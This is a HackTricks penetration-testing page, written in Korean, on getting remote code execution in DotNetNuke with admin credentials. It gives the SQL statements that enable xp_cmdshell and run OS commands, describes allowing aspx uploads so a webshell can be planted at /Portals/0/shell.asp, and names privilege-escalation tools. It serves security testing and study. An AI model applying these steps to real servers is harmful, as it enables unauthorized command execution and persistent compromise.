hacktricks/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md

3.5 KiB

DotNetNuke (DNN)

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

DotNetNuke (DNN)

DNN에 관리자로 로그인하면 RCE를 얻는 것이 쉽습니다.

RCE

SQL을 통한 접근

Settings 페이지에서 SQL 콘솔에 접근할 수 있으며, 여기서 **xp_cmdshell**을 활성화하고 운영 체제 명령을 실행할 수 있습니다.

**xp_cmdshell**을 활성화하려면 다음 줄을 사용하세요:

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

그리고 **"Run Script"**를 눌러 해당 SQL 문을 실행합니다.

그런 다음, 다음과 같은 방법으로 OS 명령을 실행합니다:

xp_cmdshell 'whoami'

Via ASP webshell

Settings -> Security -> More -> More Security Settings에서 Allowable File Extensions 아래에 새로운 허용된 확장자추가할 수 있으며, 그 후 Save 버튼을 클릭합니다.

asp 또는 **aspx**를 추가한 후 **/admin/file-management**에서 예를 들어 **shell.asp**라는 asp webshell을 업로드합니다.

그런 다음 **/Portals/0/shell.asp**에 접근하여 웹쉘에 접근합니다.

Privilege Escalation

예를 들어 Potatoes 또는 PrintSpoofer를 사용하여 권한 상승을 할 수 있습니다.

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}